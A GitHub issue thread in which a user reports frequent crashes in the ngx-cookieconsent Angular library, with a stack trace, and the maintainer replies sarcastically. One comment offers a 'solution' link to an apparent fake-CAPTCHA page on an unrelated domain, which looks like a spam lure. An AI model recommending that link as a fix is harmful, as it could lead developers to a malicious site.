### ISSUE TITLE
[Bug] Do NOT use this BUGGY library

### ISSUE THREAD

**Issue by hsq125** [tinesoft/ngx-cookieconsent#152]
### Ngx-CookieConsent Version

6

### CookieConsent Version

3

### Angular CLI (or Nx CLI) Version

18

### Node Version

20

### OS Version

Ubuntu

### Expected Behaviour

Not crashing in the middle of nowhere !

### Actual Behaviour

This lbrary crash almost everywhere you would not expect. On your few development computers, you can check that everything is OK, but when you expose it to the entire world, then you can see errors of all kinds literaly flooding your monitoring. 

Here is an example, but there are at least 6 other weird crash cases.
```

Stack Trace
TypeError
Cannot read properties of undefined (reading 'content')
{snip} is.ccService.getConfig().content=this.ccService.getConfig().content||{},this.ccService.getConfig().content.header=m["cookie.

```

My advice is to avoid this buggy library. The code is a gas factory that has a disgusting integration with the vanilla cookieconsent library. Problem guaranteed.

### Steps to reproduce the behaviour

Just load it in your project

**Comment by ahmedra13579** [comment]
maybe this solution will solve your problem [link](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by tinesoft** [comment]
Hi @hsq125 

Thank your for your **very valuable and constructive** feedack! 

You [sure know how to contribute](https://opensource.guide/how-to-contribute/) to an oss project!

Have a nice day
